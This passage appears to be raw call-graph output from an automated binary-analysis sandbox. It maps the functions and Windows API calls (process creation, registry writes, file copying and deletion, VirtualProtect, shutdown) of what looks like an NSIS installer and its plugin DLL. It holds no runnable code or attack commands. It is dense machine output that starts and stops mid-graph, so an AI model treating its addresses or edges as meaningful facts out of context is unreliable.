100012f1 4071->4072 4073 10001316 4071->4073 4072->4073 4074 100012fd lstrcpyA 4072->4074 4073->4019 4074->4073 4075->4029 4978 1000182a 4979 1000123b 3 API calls 4978->4979 4980 10001850 4979->4980 4981 1000123b 3 API calls 4980->4981 4982 10001858 4981->4982 4983 10001895 4982->4983 4984 1000123b 3 API calls 4982->4984 4987 10001278 2 API calls 4983->4987 4985 1000187a 4984->4985 4986 10001883 GlobalFree 4985->4986 4986->4983 4988 10001a0c GlobalFree GlobalFree 4987->4988 4100 4030ef #17 SetErrorMode OleInitialize 4173 405ea2 GetModuleHandleA 4100->4173 4104 40315f GetCommandLineA 4178 405b77 lstrcpynA 4104->4178 4106 403171 GetModuleHandleA 4107 403188 4106->4107 4108 40564f CharNextA 4107->4108 4109 40319c CharNextA 4108->4109 4111 4031ac 4109->4111 4110 403271 4112 403284 GetTempPathA 4110->4112 4111->4110 4111->4111 4115 40564f CharNextA 4111->4115 4120 403273 4111->4120 4179 4030bb 4112->4179 4114 40329c 4116 4032a0 GetWindowsDirectoryA lstrcatA 4114->4116 4117 4032f6 DeleteFileA 4114->4117 4115->4111 4119 4030bb 11 API calls 4116->4119 4187 402c33 GetTickCount GetModuleFileNameA 4117->4187 4122 4032bc 4119->4122 4269 405b77 lstrcpynA 4120->4269 4121 40330a 4123 4033a0 4121->4123 4126 403390 4121->4126 4131 40564f CharNextA 4121->4131 4122->4117 4125 4032c0 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4122->4125 4286 403548 4123->4286 4128 4030bb 11 API calls 4125->4128 4215 403622 4126->4215 4129 4032ee 4128->4129 4129->4117 4129->4123 4133 403325 4131->4133 4140 40336b 4133->4140 4141 4033cf lstrcatA lstrcmpiA 4133->4141 4134 4033b9 4293 4053a8 4134->4293 4135 4034ad 4136 403530 ExitProcess 4135->4136 4138 405ea2 3 API calls 4135->4138 4143 4034bc 4138->4143 4270 405712 4140->4270 4141->4123 4145 4033eb CreateDirectoryA SetCurrentDirectoryA 4141->4145 4146 405ea2 3 API calls 4143->4146 4148 403402 4145->4148 4149 40340d 4145->4149 4152 4034c5 4146->4152 4297 405b77 lstrcpynA 4148->4297 4298 405b77 lstrcpynA 4149->4298 4154 405ea2 3 API calls 4152->4154 4156 4034ce 4154->4156 4155 403385 4285 405b77 lstrcpynA 4155->4285 4159 40351c ExitWindowsEx 4156->4159 4164 4034dc GetCurrentProcess 4156->4164 4158 405b99 18 API calls 4160 40344c DeleteFileA 4158->4160 4159->4136 4161 403529 4159->4161 4162 403459 CopyFileA 4160->4162 4170 40341b 4160->4170 4307 40140b 4161->4307 4162->4170 4166 4034ec 4164->4166 4165 4034a1 4167 405a2b 40 API calls 4165->4167 4166->4159 4167->4123 4169 405b99 18 API calls 4169->4170 4170->4158 4170->4165 4170->4169 4172 40348d CloseHandle 4170->4172 4299 405a2b 4170->4299 4304 405347 CreateProcessA 4170->4304 4172->4170 4174 405ec9 GetProcAddress 4173->4174 4175 405ebe LoadLibraryA 4173->4175 4176 403134 SHGetFileInfoA 4174->4176 4175->4174 4175->4176 4177 405b77 lstrcpynA 4176->4177 4177->4104 4178->4106 4180 405de2 5 API calls 4179->4180 4181 4030c7 4180->4181 4182 4030d1 4181->4182 4310 405624 lstrlenA CharPrevA 4181->4310 4182->4114 4185 405854 2 API calls 4186 4030ed 4185->4186 4186->4114 4313 405825 GetFileAttributesA CreateFileA 4187->4313 4189 402c73 4208 402c83 4189->4208 4314 405b77 lstrcpynA 4189->4314 4191 402c99 4315 40566b lstrlenA 4191->4315 4195 402caa GetFileSize 4196 402da6 4195->4196 4210 402cc1 4195->4210 4322 402bcf 4196->4322 4198 402daf 4200 402ddf GlobalAlloc 4198->4200 4198->4208 4333 4030a4 SetFilePointer 4198->4333 4334 4030a4 SetFilePointer 4200->4334 4202 402e12 4205 402bcf 6 API calls 4202->4205 4204 402dfa 4335 402e6c 4204->4335 4205->4208 4206 402dc8 4209 403072 ReadFile 4206->4209 4208->4121 4211 402dd3 4209->4211 4210->4196 4210->4202 4210->4208 4212 402bcf 6 API calls 4210->4212 4320 403072 ReadFile 4210->4320 4211->4200 4211->4208 4212->4210 4213 402e06 4213->4208 4213->4213 4214 402e43 SetFilePointer 4213->4214 4214->4208 4216 405ea2 3 API calls 4215->4216 4217 403636 4216->4217 4218 40363c 4217->4218 4219 40364e 4217->4219 4371 405ad5 wsprintfA 4218->4371 4220 405a5e 3 API calls 4219->4220 4221 403679 4220->4221 4223 403697 lstrcatA 4221->4223 4225 405a5e 3 API calls 4221->4225 4224 40364c 4223->4224 4362 4038e7 4224->4362 4225->4223 4228 405712 18 API calls 4229 4036c9 4228->4229 4230 403752 4229->4230 4232 405a5e 3 API calls 4229->4232 4231 405712 18 API calls 4230->4231 4233 403758 4231->4233 4234 4036f5 4232->4234 4235 403768 LoadImageA 4233->4235 4236 405b99 18 API calls 4233->4236 4234->4230 4239 403711 lstrlenA 4234->4239 4242 40564f CharNextA 4234->4242 4237 40380e 4235->4237 4238 40378f RegisterClassA 4235->4238 4236->4235 4241 40140b 2 API calls 4237->4241 4240 4037c5 SystemParametersInfoA CreateWindowExA 4238->4240 4268 403818 4238->4268 4243 403745 4239->4243 4244 40371f lstrcmpiA 4239->4244 4240->4237 4245 403814 4241->4245 4246 40370f 4242->4246 4248 405624 3 API calls 4243->4248 4244->4243 4247 40372f GetFileAttributesA 4244->4247 4251 4038e7 19 API calls 4245->4251 4245->4268 4246->4239 4250 40373b 4247->4250 4249 40374b 4248->4249 4372 405b77 lstrcpynA 4249->4372 4250->4243 4254 40566b 2 API calls 4250->4254 4252 403825 4251->4252 4255 403831 ShowWindow LoadLibraryA 4252->4255 4256 4038b4 4252->4256 4254->4243 4257 403850 LoadLibraryA 4255->4257 4258 403857 GetClassInfoA 4255->4258 4259 404f56 5 API calls 4256->4259 4257->4258 4260 403881 DialogBoxParamA 4258->4260 4261 40386b GetClassInfoA RegisterClassA 4258->4261 4262 4038ba 4259->4262 4263 40140b 2 API calls 4260->4263 4261->4260 4264 4038d6 4262->4264 4265 4038be 4262->4265 4263->4268 4266 40140b 2 API calls 4264->4266 4267 40140b 2 API calls 4265->4267 4265->4268 4266->4268 4267->4268 4268->4123 4269->4112 4374 405b77 lstrcpynA 4270->4374 4272 405723 4375 4056bd CharNextA CharNextA 4272->4375 4275 403376 4275->4123 4284 405b77 lstrcpynA 4275->4284 4276 405de2 5 API calls 4282 405739 4276->4282 4277 405764 lstrlenA 4278 40576f 4277->4278 4277->4282 4280 405624 3 API calls 4278->4280 4281 405774 GetFileAttributesA 4280->4281 4281->4275 4282->4275 4282->4277 4283 40566b 2 API calls 4282->4283 4381 405e7b FindFirstFileA 4282->4381 4283->4277 4284->4155 4285->4126 4287 403560 4286->4287 4288 403552 CloseHandle 4286->4288 4384 40358d 4287->4384 4288->4287 4296 4053bd 4293->4296 4294 4033c7 ExitProcess 4295 4053d1 MessageBoxIndirectA 4295->4294 4296->4294 4296->4295 4297->4149 4298->4170 4300 405ea2 3 API calls 4299->4300 4301 405a32 4300->4301 4303 405a53 4301->4303 4441 40589d lstrcpyA 4301->4441 4303->4170 4305 405382 4304->4305 4306 405376 CloseHandle 4304->4306 4305->4170 4306->4305 4308 401389 2 API calls 4307->4308 4309 401420 4308->4309 4309->4136 4311 4030d9 CreateDirectoryA 4310->4311 4312 40563e lstrcatA 4310->4312 4311->4185 4312->4311 4313->4189 4314->4191 4316 405678 4315->4316 4317 402c9f 4316->4317 4318 40567d CharPrevA 4316->4318 4319 405b77 lstrcpynA 4317->4319 4318->4316 4318->4317 4319->4195 4321 403093 4320->4321 4321->4210 4323 402bf0 4322->4323 4324 402bd8 4322->4324 4327 402c00 GetTickCount 4323->4327 4328 402bf8 4323->4328 4325 402be1 DestroyWindow 4324->4325 4326 402be8 4324->4326 4325->4326 4326->4198 4329 402c31 4327->4329 4330 402c0e CreateDialogParamA ShowWindow 4327->4330 4357 405edb 4328->4357 4329->4198 4330->4329 4333->4206 4334->4204 4337 402e84 4335->4337 4336 402eb1 4339 403072 ReadFile 4336->4339 4337->4336 4361 4030a4 SetFilePointer 4337->4361 4340 402ebc 4339->4340 4341 403001 4340->4341 4342 402ece GetTickCount 4340->4342 4344 402fec 4340->4344 4343 40304d 4341->4343 4348 403005 4341->4348 4342->4344 4354 402ef7 4342->4354 4345 403072 ReadFile 4343->4345 4344->4213 4345->4344 4346 403072 ReadFile 4346->4354 4347 403072 ReadFile 4347->4348 4348->4344 4348->4347 4349 403025 WriteFile 4348->4349 4349->4344 4350 40303a 4349->4350 4350->4344 4350->4348 4352 40304b 4350->4352 4351 402f4d GetTickCount 4351->4354 4352->4344 4353 402f76 MulDiv wsprintfA 4355 404e84 25 API calls 4353->4355 4354->4344 4354->4346 4354->4351 4354->4353 4356 402fb4 WriteFile 4354->4356 4355->4354 4356->4344 4356->4354 4358 405ef8 PeekMessageA 4357->4358 4359 402bfe 4358->4359 4360 405eee DispatchMessageA 4358->4360 4359->4198 4360->4358 4361->4336 4363 4038fb 4362->4363 4373 405ad5 wsprintfA 4363->4373 4365 40396c 4366 405b99 18 API calls 4365->4366 4367 403978 SetWindowTextA 4366->4367 4368 403994 4367->4368 4369 4036a7 4367->4369 4368->4369 4370 405b99 18 API calls 4368->4370 4369->4228 4370->4368 4371->4224 4372->4230 4373->4365 4374->4272 4376 4056e8 4375->4376 4377 4056d8 4375->4377 4379 40564f CharNextA 4376->4379 4380 405708 4376->4380 4377->4376 4378 4056e3 CharNextA 4377->4378 4378->4380 4379->4376 4380->4275 4380->4276 4382 405e91 FindClose 4381->4382 4383 405e9c 4381->4383 4382->4383 4383->4282 4385 40359b 4384->4385 4386 403565 4385->4386 4387 4035a0 FreeLibrary GlobalFree 4385->4387 4388 405454 4386->4388 4387->4386 4387->4387 4389 405712 18 API calls 4388->4389 4390 405474 4389->4390 4391 405493 4390->4391 4392 40547c DeleteFileA 4390->4392 4394 4055c1 4391->4394 4428 405b77 lstrcpynA 4391->4428 4393 4033a9 OleUninitialize 4392->4393 4393->4134 4393->4135 4394->4393 4400 405e7b 2 API calls 4394->4400 4396 4054b9 4397 4054cc 4396->4397 4398 4054bf lstrcatA 4396->4398 4399 40566b 2 API calls 4397->4399 4401 4054d2 4398->4401 4399->4401 4403 4055e5 4400->4403 4402 4054e0 lstrcatA 4401->4402 4404 4054eb lstrlenA FindFirstFileA 4401->4404 4402->4404 4403->4393 4405 4055e9 4403->4405 4404->4394 4410 40550f 4404->4410 4406 405624 3 API calls 4405->4406 4408 4055ef 4406->4408 4407 40564f CharNextA 4407->4410 4409 40540c 5 API calls 4408->4409 4411 4055fb 4409->4411 4410->4407 4415 4055a0 FindNextFileA 4410->4415 4419 405561 4410->4419 4429 405b77 lstrcpynA 4410->4429 4412 405615 4411->4412 4413 4055ff 4411->4413 4414 404e84 25 API calls 4412->4414 4413->4393 4417 404e84 25 API calls 4413->4417 4414->4393 4415->4410 4418 4055b8 FindClose 4415->4418 4420 40560c 4417->4420 4418->4394 4419->4415 4423 405454 64 API calls 4419->4423 4425 404e84 25 API calls 4419->4425 4426 404e84 25 API calls 4419->4426 4427 405a2b 40 API calls 4419->4427 4430 40540c 4419->4430 4421 405a2b 40 API calls 4420->4421 4424 405613 4421->4424 4423->4419 4424->4393 4425->4415 4426->4419 4427->4419 4428->4396 4429->4410 4438 405800 GetFileAttributesA 4430->4438 4433 405427 RemoveDirectoryA 4436 405435 4433->4436 4434 40542f DeleteFileA 4434->4436 4435 405439 4435->4419 4436->4435 4437 405445 SetFileAttributesA 4436->4437 4437->4435 4439 405812 SetFileAttributesA 4438->4439 4440 405418 4438->4440 4439->4440 4440->4433 4440->4434 4440->4435 4442 4058c6 4441->4442 4443 4058ec GetShortPathNameA 4441->4443 4465 405825 GetFileAttributesA CreateFileA 4442->4465 4445 405901 4443->4445 4446 405a25 4443->4446 4445->4446 4448 405909 wsprintfA 4445->4448 4446->4303 4447 4058d0 CloseHandle GetShortPathNameA 4447->4446 4449 4058e4 4447->4449 4450 405b99 18 API calls 4448->4450 4449->4443 4449->4446 4451 405931 4450->4451 4466 405825 GetFileAttributesA CreateFileA 4451->4466 4453 40593e 4453->4446 4454 40594d GetFileSize GlobalAlloc 4453->4454 4455 405a1e CloseHandle 4454->4455 4456 40596f ReadFile 4454->4456 4455->4446 4456->4455 4457 405987 4456->4457 4457->4455 4467 40578a lstrlenA 4457->4467 4460 4059a0 lstrcpyA 4463 4059c2 4460->4463 4461 4059b4 4462 40578a 4 API calls 4461->4462 4462->4463 4464 4059f9 SetFilePointer WriteFile GlobalFree 4463->4464 4464->4455 4465->4447 4466->4453 4468 4057cb lstrlenA 4467->4468 4469 4057d3 4468->4469 4470 4057a4 lstrcmpiA 4468->4470 4469->4460 4469->4461 4470->4469 4471 4057c2 CharNextA 4470->4471 4471->4468 4989 4014f0 SetForegroundWindow 4990 40289c 4989->4990 4991 401af0 4992 402a07 18 API calls 4991->4992 4993 401af7 4992->4993 4994 4029ea 18 API calls 4993->4994 4995 401b00 wsprintfA 4994->4995 4996 40289c 4995->4996 4997 4019f1 4998 402a07 18 API calls 4997->4998 4999 4019fa ExpandEnvironmentStringsA 4998->4999 5000 401a21 4999->5000 5001 401a0e 4999->5001 5001->5000 5002 401a13 lstrcmpA 5001->5002 5002->5000 5003 402877 SendMessageA 5004 402891 InvalidateRect 5003->5004 5005 40289c 5003->5005 5004->5005 5006 10001637 5007 10001666 5006->5007 5008 10001a86 19 API calls 5007->5008 5009 1000166d 5008->5009 5010 10001680 5009->5010 5011 10001674 5009->5011 5013 100016a7 5010->5013 5014 1000168a 5010->5014 5012 10001278 2 API calls 5011->5012 5018 1000167e 5012->5018 5016 100016d1 5013->5016 5017 100016ad 5013->5017 5015 100014ff 3 API calls 5014->5015 5019 1000168f 5015->5019 5021 100014ff 3 API calls 5016->5021 5020 10001576 3 API calls 5017->5020 5022 10001576 3 API calls 5019->5022 5023 100016b2 5020->5023 5021->5018 5024 10001695 5022->5024 5025 10001278 2 API calls 5023->5025 5026 10001278 2 API calls 5024->5026 5027 100016b8 GlobalFree 5025->5027 5028 1000169b GlobalFree 5026->5028 5027->5018 5029 100016cc GlobalFree 5027->5029 5028->5018 5029->5018 5030 401c78 5031 4029ea 18 API calls 5030->5031 5032 401c7e IsWindow 5031->5032 5033 4019e1 5032->5033 4690 40227d 4691 402a07 18 API calls 4690->4691 4692 40228e 4691->4692 4693 402a07 18 API calls 4692->4693 4694 402297 4693->4694 4695 402a07 18 API calls 4694->4695 4696 4022a1 GetPrivateProfileStringA 4695->4696 5034 1000103d 5035 1000101b 8 API calls 5034->5035 5036 10001056 5035->5036 5037 40427e 5038 4042b4 5037->5038 5039 40428e 5037->5039 5040 403eee 8 API calls 5038->5040 5041 403e87 19 API calls 5039->5041 5042 4042c0 5040->5042 5043 40429b SetDlgItemTextA 5041->5043 5043->5038 5044 4014fe 5045 401506 5044->5045 5047 401519 5044->5047 5046 4029ea 18 API calls 5045->5046 5046->5047 5048 401000 5049 401037 BeginPaint GetClientRect 5048->5049 5050 40100c DefWindowProcA 5048->5050 5052 4010f3 5049->5052 5053 401179 5050->5053 5054 401073 CreateBrushIndirect FillRect DeleteObject 5052->5054 5055 4010fc 5052->5055 5054->5052 5056 401102 CreateFontIndirectA 5055->5056 5057 401167 EndPaint 5055->5057 5056->5057 5058 401112 6 API calls 5056->5058 5057->5053 5058->5057 5059 404801 GetDlgItem GetDlgItem 5060 404853 7 API calls 5059->5060 5068 404a6b 5059->5068 5061 4048f6 DeleteObject 5060->5061 5062 4048e9 SendMessageA 5060->5062 5063 4048ff 5061->5063 5062->5061 5065 404936 5063->5065 5067 405b99 18 API calls 5063->5067 5064 404b4f 5066 404bfb 5064->5066 5070 404a5e 5064->5070 5075 404ba8 SendMessageA 5064->5075 5069 403e87 19 API calls 5065->5069 5071 404c05 SendMessageA 5066->5071 5072 404c0d 5066->5072 5073 404918 SendMessageA SendMessageA 5067->5073 5068->5064 5091 404adc 5068->5091 5112 40474f SendMessageA 5068->5112 5074 40494a 5069->5074 5076 403eee 8 API calls 5070->5076 5071->5072 5083 404c26 5072->5083 5084 404c1f ImageList_Destroy 5072->5084 5088 404c36 5072->5088 5073->5063 5079 403e87 19 API calls 5074->5079 5075->5070 5081 404bbd SendMessageA 5075->5081 5082 404df1 5076->5082 5077 404b41 SendMessageA 5077->5064 5092 404958 5079->5092 5080 404da5 5080->5070 5089 404db7 ShowWindow GetDlgItem ShowWindow 5080->5089 5086 404bd0 5081->5086 5087 404c2f GlobalFree 5083->5087 5083->5088 5084->5083 5085 404a2c GetWindowLongA SetWindowLongA 5090 404a45 5085->5090 5097 404be1 SendMessageA 5086->5097 5087->5088 5088->5080 5106 404c71 5088->5106 5117 4047cf 5088->5117 5089->5070 5093 404a63 5090->5093 5094 404a4b ShowWindow 5090->5094 5091->5064 5091->5077 5092->5085 5096 4049a7 SendMessageA 5092->5096 5098 404a26 5092->5098 5100 4049e3 SendMessageA 5092->5100 5101 4049f4 SendMessageA 5092->5101 5111 403ebc SendMessageA 5093->5111 5110 403ebc SendMessageA 5094->5110 5096->5092 5097->5066 5098->5085 5098->5090 5100->5092 5101->5092 5103 404d7b InvalidateRect 5103->5080 5105 404d91 5103->5105 5104 404cb5 5104->5103 5109 404d29 SendMessageA SendMessageA 5104->5109 5108 40466d 21 API calls 5105->5108 5106->5104 5107 404c9f SendMessageA 5106->5107 5107->5104 5108->5080 5109->5104 5110->5070 5111->5068 5113 404772 GetMessagePos ScreenToClient SendMessageA 5112->5113 5114 4047ae SendMessageA 5112->5114 5115 4047a6 5113->5115 5116 4047ab 5113->5116 5114->5115 5115->5091 5116->5114 5126 405b77 lstrcpynA 5117->5126 5119 4047e2 5127 405ad5 wsprintfA 5119->5127 5121 4047ec 5122 40140b 2 API calls 5121->5122 5123 4047f5 5122->5123 5128 405b77 lstrcpynA 5123->5128 5125 4047fc 5125->5106 5126->5119 5127->5121 5128->5125 3860 100026c2 3861 10002712 3860->3861 3862 100026d2 VirtualProtect 3860->3862 3862->3861 5129 401705 5130 402a07 18 API calls 5129->5130 5131 40170c SearchPathA 5130->5131 5132 4027c7 5131->5132 5133 401727 5131->5133 5133->5132 5135 405b77 lstrcpynA 5133->5135 5135->5132 5136 404607 5137 404633 5136->5137 5138 404617 5136->5138 5140 404666 5137->5140 5141 404639 SHGetPathFromIDListA 5137->5141 5147 40538c GetDlgItemTextA 5138->5147 5143 404650 SendMessageA 5141->5143 5144 404649 5141->5144 5142 404624 SendMessageA 5142->5137 5143->5140 5146 40140b 2 API calls 5144->5146 5146->5143 5147->5142 5148 404e07 5149 404e1b IsWindowVisible 5148->5149 5150 404e0b 5148->5150 5152 404e31 5149->5152 5153 404e65 5149->5153 5151 403ed3 SendMessageA 5150->5151 5155 404e18 5151->5155 5156 40474f 5 API calls 5152->5156 5154 404e6a CallWindowProcA 5153->5154 5154->5155 5157 404e3b 5156->5157 5157->5154 5158 4047cf 4 API calls 5157->5158 5158->5153 5159 402188 5160 402a07 18 API calls 5159->5160 5161 40218e 5160->5161 5162 402a07 18 API calls 5161->5162 5163 402197 5162->5163 5164 402a07 18 API calls 5163->5164 5165 4021a0 5164->5165 5166 405e7b 2 API calls 5165->5166 5167 4021a9 5166->5167 5168 4021ba lstrlenA lstrlenA 5167->5168 5169 4021ad 5167->5169 5171 404e84 25 API calls 5168->5171 5170 404e84 25 API calls 5169->5170 5173 4021b5 5169->5173 5170->5173 5172 4021f6 SHFileOperationA 5171->5172 5172->5169 5172->5173 5174 40220a 5175 402211 5174->5175 5178 402224 5174->5178 5176 405b99 18 API calls 5175->5176 5177 40221e 5176->5177 5179 4053a8 MessageBoxIndirectA 5177->5179 5179->5178 5180 40260c 5181 402613 5180->5181 5182 40289c 5180->5182 5183 402619 FindClose 5181->5183 5183->5182 5184 40268d 5185 402a07 18 API calls 5184->5185 5187 40269b 5185->5187 5186 4026b1 5188 405800 2 API calls 5186->5188 5187->5186 5189 402a07 18 API calls 5187->5189 5190 4026b7 5188->5190 5189->5186 5210 405825 GetFileAttributesA CreateFileA 5190->5210 5192 4026c4 5193 4026d0 GlobalAlloc 5192->5193 5194 40276d 5192->5194 5195 402764 CloseHandle 5193->5195 5196 4026e9 5193->5196 5197 402775 DeleteFileA 5194->5197 5198 402788 5194->5198 5195->5194 5211 4030a4 SetFilePointer 5196->5211 5197->5198 5200 4026ef 5201 403072 ReadFile 5200->5201 5202 4026f8 GlobalAlloc 5201->5202 5203 402708 5202->5203 5204 40273c WriteFile GlobalFree 5202->5204 5206 402e6c 33 API calls 5203->5206 5205 402e6c 33 API calls 5204->5205 5207 402761 5205->5207 5209 402715 5206->5209 5207->5195 5208 402733 GlobalFree 5208->5204 5209->5208 5210->5192 5211->5200 5212 40278e 5213 4029ea 18 API calls 5212->5213 5214 402794 5213->5214 5215 4027b8 5214->5215 5216 4027cf 5214->5216 5222 40266d 5214->5222 5217 4027bd 5215->5217 5225 4027cc 5215->5225 5218 4027e5 5216->5218 5219 4027d9 5216->5219 5226 405b77 lstrcpynA 5217->5226 5221 405b99 18 API calls 5218->5221 5220 4029ea 18 API calls 5219->5220 5220->5225 5221->5225 5225->5222 5227 405ad5 wsprintfA 5225->5227 5226->5222 5227->5222 5228 401490 5229 404e84 25 API calls 5228->5229 5230 401497 5229->5230 5231 100015d0 5232 100014d8 4 API calls 5231->5232 5235 100015e8 5232->5235 5233 1000162e GlobalFree 5234 10001603 5234->5233 5235->5233 5235->5234 5236 1000161a VirtualFree 5235->5236 5236->5233 5237 401b11 5238 401b62 5237->5238 5239 401b1e 5237->5239 5240 401b66 5238->5240 5241 401b8b GlobalAlloc 5238->5241 5245 401ba6 5239->5245 5247 401b35 5239->5247 5249 402224 5240->5249 5258 405b77 lstrcpynA 5240->5258 5242 405b99 18 API calls 5241->5242 5242->5245 5243 405b99 18 API calls 5246 40221e 5243->5246 5245->5243 5245->5249 5251 4053a8 MessageBoxIndirectA 5246->5251 5256 405b77 lstrcpynA 5247->5256 5248 401b78 GlobalFree 5248->5249 5251->5249 5252 401b44 5257 405b77 lstrcpynA 5252->5257 5254 401b53 5259 405b77 lstrcpynA 5254->5259 5256->5252 5257->5254 5258->5248 5259->5249 5260 402814 5261 4029ea 18 API calls 5260->5261 5262 40281a 5261->5262 5263 40284b 5262->5263 5264 40266d 5262->5264 5266 402828 5262->5266 5263->5264 5265 405b99 18 API calls 5263->5265 5265->5264 5266->5264 5268 405ad5 wsprintfA 5266->5268 5268->5264 4578 401595 4579 402a07 18 API calls 4578->4579 4580 40159c SetFileAttributesA 4579->4580 4581 4015ae 4580->4581 5269 401c95 5270 4029ea 18 API calls 5269->5270 5271 401c9c 5270->5271 5272 4029ea 18 API calls 5271->5272 5273 401ca4 GetDlgItem 5272->5273 5274 4024c9 5273->5274 4600 402517 4601 4029ea 18 API calls 4600->4601 4604 402521 4601->4604 4602 402597 4603 402555 ReadFile 4603->4602 4603->4604 4604->4602 4604->4603 4605 402599 4604->4605 4606 4025a9 4604->4606 4609 405ad5 wsprintfA 4605->4609 4606->4602 4608 4025bf SetFilePointer 4606->4608 4608->4602 4609->4602 5275 10001058 5276 1000123b 3 API calls 5275->5276 5278 10001074 5276->5278 5277 100010dc 5278->5277 5279 100014d8 4 API calls 5278->5279 5280 10001091 5278->5280 5279->5280 5281 100014d8 4 API calls 5280->5281 5282 100010a1 5281->5282 5283 100010b1 5282->5283 5284 100010a8 GlobalSize 5282->5284 5285 100010b5 GlobalAlloc 5283->5285 5286 100010c6 5283->5286 5284->5283 5287 100014ff 3 API calls 5285->5287 5288 100010d1 GlobalFree 5286->5288 5287->5286 5288->5277 4659 40231a 4660 402320 4659->4660 4661 402a07 18 API calls 4660->4661 4662 402332 4661->4662 4663 402a07 18 API calls 4662->4663 4664 40233c RegCreateKeyExA 4663->4664 4665 402366 4664->4665 4666 40266d 4664->4666 4667 40237e 4665->4667 4668 402a07 18 API calls 4665->4668 4669 40238a 4667->4669 4671 4029ea 18 API calls 4667->4671 4670 402377 lstrlenA 4668->4670 4672 4023a5 RegSetValueExA 4669->4672 4673 402e6c 33 API calls 4669->4673 4670->4667 4671->4669 4674 4023bb RegCloseKey 4672->4674 4673->4672 4674->4666 5289 403f9b lstrcpynA lstrlenA 5290 404e1c 5291 404e24 IsWindowVisible 5290->5291 5295 404e3b 5290->5295 5292 404e31 5291->5292 5298 404e65 5291->5298 5294 40474f 5 API calls 5292->5294 5293 404e6a CallWindowProcA 5296 404e7e 5293->5296 5294->5295 5295->5293 5297 4047cf 4 API calls 5295->5297 5297->5298 5298->5293 5299 100010e0 5300 1000110e 5299->5300 5301 1000123b 3 API calls 5300->5301 5308 1000111e 5301->5308 5302 100011c4 GlobalFree 5303 100012bf 2 API calls 5303->5308 5304 100011c3 5304->5302 5305 1000123b 3 API calls 5305->5308 5306 10001155 GlobalAlloc 5306->5308 5307 100011ea GlobalFree 5307->5308 5308->5302 5308->5303 5308->5304 5308->5305 5308->5306 5308->5307 5309 10001278 2 API calls 5308->5309 5310 100011b1 GlobalFree 5308->5310 5311 100012e8 lstrcpyA 5308->5311 5309->5310 5310->5308 5311->5308 5312 4016a1 5313 402a07 18 API calls 5312->5313 5314 4016a7 GetFullPathNameA 5313->5314 5315 4016be 5314->5315 5316 4016df 5314->5316 5315->5316 5319 405e7b 2 API calls 5315->5319 5317 4016f3 GetShortPathNameA 5316->5317 5318 40289c 5316->5318 5317->5318 5320 4016cf 5319->5320 5320->5316 5322 405b77 lstrcpynA 5320->5322 5322->5316 5323 402626 5324 402641 5323->5324 5325 402629 5323->5325 5326 4027c7 5324->5326 5329 405b77 lstrcpynA 5324->5329 5327 402636 FindNextFileA 5325->5327 5327->5324 5329->5326 5330 401d26 GetDC GetDeviceCaps 5331 4029ea 18 API calls 5330->5331 5332 401d44 MulDiv ReleaseDC 5331->5332 5333 4029ea 18 API calls 5332->5333 5334 401d63 5333->5334 5335 405b99 18 API calls 5334->5335 5336 401d9c CreateFontIndirectA 5335->5336 5337 4024c9 5336->5337 4079 40172c 4080 402a07 18 API calls 4079->4080 4081 401733 4080->4081 4085 405854 4081->4085 4083 40173a 4084 405854 2 API calls 4083->4084 4084->4083 4086 40585f GetTickCount GetTempFileNameA 4085->4086 4087 405890 4086->4087 4088 40588c 4086->4088 4087->4083 4088->4086 4088->4087 4089 401dac 4097 4029ea 4089->4097 4091 401db2 4092 4029ea 18 API calls 4091->4092 4093 401dbb 4092->4093 4094 401dc2 ShowWindow 4093->4094 4095 401dcd EnableWindow 4093->4095 4096 40289c 4094->4096 4095->4096 4098 405b99 18 API calls 4097->4098 4099 4029fe 4098->4099 4099->4091 5338 401eac 5339 402a07 18 API calls 5338->5339 5340 401eb3 5339->5340 5341 405e7b 2 API calls 5340->5341 5342 401eb9 5341->5342 5344 401ecb 5342->5344 5345 405ad5 wsprintfA 5342->5345 5345->5344 5346 4024ad 5347 402a07 18 API calls 5346->5347 5348 4024b4 5347->5348 5351 405825 GetFileAttributesA CreateFileA 5348->5351 5350 4024c0 5351->5350 5352 40192d 5353 402a07 18 API calls 5352->5353 5354 401934 lstrlenA 5353->5354 5355 4024c9 5354->5355 5356 401cb0 5357 4029ea 18 API calls 5356->5357 5358 401cc0 SetWindowLongA 5357->5358 5359 40289c 5358->5359 5360 401a31 5361 4029ea 18 API calls 5360->5361 5362 401a37 5361->5362 5363 4029ea 18 API calls 5362->5363 5364 4019e1 5363->5364 5365 401e32 5366 402a07 18 API calls 5365->5366 5367 401e38 5366->5367 5368 404e84 25 API calls 5367->5368 5369 401e42 5368->5369 5370 405347 2 API calls 5369->5370 5373 401e48 5370->5373 5371 401e9e CloseHandle 5375 40266d 5371->5375 5372 401e67 WaitForSingleObject 5372->5373 5374 401e75 GetExitCodeProcess 5372->5374 5373->5371 5373->5372 5373->5375 5376 405edb 2 API calls 5373->5376 5377 401e90 5374->5377 5378 401e87 5374->5378 5376->5372 5377->5371 5380 405ad5 wsprintfA 5378->5380 5380->5377 4486 4015b3 4487 402a07 18 API calls 4486->4487 4488 4015ba 4487->4488 4489 4056bd 4 API calls 4488->4489 4500 4015c2 4489->4500 4490 40160a 4492 401638 4490->4492 4493 40160f 4490->4493 4491 40564f CharNextA 4494 4015d0 CreateDirectoryA 4491->4494 4497 401423 25 API calls 4492->4497 4495 401423 25 API calls 4493->4495 4496 4015e5 GetLastError 4494->4496 4494->4500 4498 401616 4495->4498 4499 4015f2 GetFileAttributesA 4496->4499 4496->4500 4503 401630 4497->4503 4504 405b77 lstrcpynA 4498->4504 4499->4500 4500->4490 4500->4491 4502 401621 SetCurrentDirectoryA 4502->4503 4504->4502 4505 4039b4 4506 403b07 4505->4506 4507 4039cc 4505->4507 4509 403b58 4506->4509 4510 403b18 GetDlgItem GetDlgItem 4506->4510 4507->4506 4508 4039d8 4507->4508 4511 4039e3 SetWindowPos 4508->4511 4512 4039f6 4508->4512 4514 403bb2 4509->4514 4522 401389 2 API calls 4509->4522 4513 403e87 19 API calls 4510->4513 4511->4512 4516 403a13 4512->4516 4517 4039fb ShowWindow 4512->4517 4518 403b42 SetClassLongA 4513->4518 4515 403ed3 SendMessageA 4514->4515 4523 403b02 4514->4523 4545 403bc4 4515->4545 4519 403a35 4516->4519 4520 403a1b DestroyWindow 4516->4520 4517->4516 4521 40140b 2 API calls 4518->4521 4525 403a3a SetWindowLongA 4519->4525 4526 403a4b 4519->4526 4524 403e10 4520->4524 4521->4509 4527 403b8a 4522->4527 4524->4523 4534 403e41 ShowWindow 4524->4534 4525->4523 4530 403af4 4526->4530 4531 403a57 GetDlgItem 4526->4531 4527->4514 4532 403b8e SendMessageA 4527->4532 4528 40140b 2 API calls 